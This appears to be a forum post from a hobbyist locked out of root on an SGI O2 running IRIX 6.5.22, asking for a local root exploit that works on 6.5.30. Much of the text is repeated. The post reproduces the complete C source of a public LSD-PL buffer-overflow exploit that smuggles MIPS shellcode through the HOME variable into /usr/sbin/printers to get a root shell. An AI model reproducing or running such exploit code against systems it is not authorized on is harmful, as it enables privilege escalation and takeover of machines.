so I was playing with an older o2 (6.5.22m) - I booted it and the DALLAS battery went dead and I guess it must have reset the date to some very early date - enough that when I tried to log in as root it asked me to change the password (I actually don't even use a root password - I know - security lulz!). I thought no problem so I changed the password, but it still won't let me log in - asking me to change the password again - it's an endless loop of aged out passwords or something.
When I put the drive back into a regular functioning o2, I still can't log in as root, and the password I changed it to is not working. Both of the o2's I'm working on are the r10k models, so it would be a hassle currently to install the impacted root drive as an option drive to edit the /etc/shadow file. I thought an easier approach would be to just log into one of the guest accounts I have, run a local privilege elevation exploit and edit the /etc/shadow file in that manner.
So I went through the various exploits I was able to find via google, and basically all of the ones I was able to find were for older versions of IRIX, and I wasn't able to find any for 6.5.30 (That said they explicitly work for 6.5.30)
I have a go-to exploit that works for 6.5.22 (file is called irx_libdesktopicon.c):
Once I ran this on a regular user account, I was able to modify /etc/shadow
I've been thinking of upgrading to 6.5.30 from 6.5.22, but this exploit (I tend to think of it more as a time saver for me) wont work in 6.5.30. Other then playing around with setting up an external SCSI case and mounting my issue drive in that manner, I'm wondering if anyone has a slick exploit handy that works with 6.5.30 as well
When I put the drive back into a regular functioning o2, I still can't log in as root, and the password I changed it to is not working. Both of the o2's I'm working on are the r10k models, so it would be a hassle currently to install the impacted root drive as an option drive to edit the /etc/shadow file. I thought an easier approach would be to just log into one of the guest accounts I have, run a local privilege elevation exploit and edit the /etc/shadow file in that manner.
So I went through the various exploits I was able to find via google, and basically all of the ones I was able to find were for older versions of IRIX, and I wasn't able to find any for 6.5.30 (That said they explicitly work for 6.5.30)
I have a go-to exploit that works for 6.5.22 (file is called irx_libdesktopicon.c):
Code:
/*## copyright LAST STAGE OF DELIRIUM jun 2003 poland *://lsd-pl.net/ #*/
/*## libdesktopicon.so $HOME #*/
#define NOPNUM 1300
#define ADRNUM 900
#define PCHNUM 400
char setreuidcode[]=
"\x30\x0b\xff\xff" /* andi $t3,$zero,0xffff */
"\x24\x02\x04\x01" /* li $v0,1024+1 */
"\x20\x42\xff\xff" /* addi $v0,$v0,-1 */
"\x03\xff\xff\xcc" /* syscall */
"\x30\x44\xff\xff" /* andi $a0,$v0,0xffff */
"\x31\x65\xff\xff" /* andi $a1,$t3,0xffff */
"\x24\x02\x04\x64" /* li $v0,1124 */
"\x03\xff\xff\xcc" /* syscall */
;
char shellcode[]=
"\x04\x10\xff\xff" /* bltzal $zero,<shellcode> */
"\x24\x02\x03\xf3" /* li $v0,1011 */
"\x23\xff\x01\x14" /* addi $ra,$ra,276 */
"\x23\xe4\xff\x08" /* addi $a0,$ra,-248 */
"\x23\xe5\xff\x10" /* addi $a1,$ra,-240 */
"\xaf\xe4\xff\x10" /* sw $a0,-240($ra) */
"\xaf\xe0\xff\x14" /* sw $zero,-236($ra) */
"\xa3\xe0\xff\x0f" /* sb $zero,-241($ra) */
"\x03\xff\xff\xcc" /* syscall */
"/bin/sh"
;
char jump[]=
"\x03\xa0\x10\x25" /* move $v0,$sp */
"\x03\xe0\x00\x08" /* jr $ra */
;
char nop[]="\x24\x0f\x12\x34";
main(int argc,char **argv){
char buffer[10000],adr[4],pch[4],*b,*envp[2];
int i;
printf("copyright LAST STAGE OF DELIRIUM jun 2003 poland //lsd-pl.net/\n");
printf("libdesktopicon.so $HOME for irix 6.2 6.3 6.4 6.5 6.5.21 ");
printf("IP:ALL\n\n");
if(argc!=2){
printf("usage: %s xserver:display\n",argv[0]);
exit(-1);
}
*((unsigned long*)adr)=(*(unsigned long(*)())jump)()+8580+3056+600;
*((unsigned long*)pch)=(*(unsigned long(*)())jump)()+8580+400+31552;
envp[0]=buffer;
envp[1]=0;
b=buffer;
sprintf(b,"HOME=");
b+=5;
for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
for(i=0;i<PCHNUM;i++) *b++=pch[i%4];
for(i=0;i<1+4-((strlen(argv[1])%4));i++) *b++=0xff;
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i];
for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
*b=0;
execle("/usr/sbin/printers","lsd","-display",argv[1],0,envp);
}I've been thinking of upgrading to 6.5.30 from 6.5.22, but this exploit (I tend to think of it more as a time saver for me) wont work in 6.5.30. Other then playing around with setting up an external SCSI case and mounting my issue drive in that manner, I'm wondering if anyone has a slick exploit handy that works with 6.5.30 as well
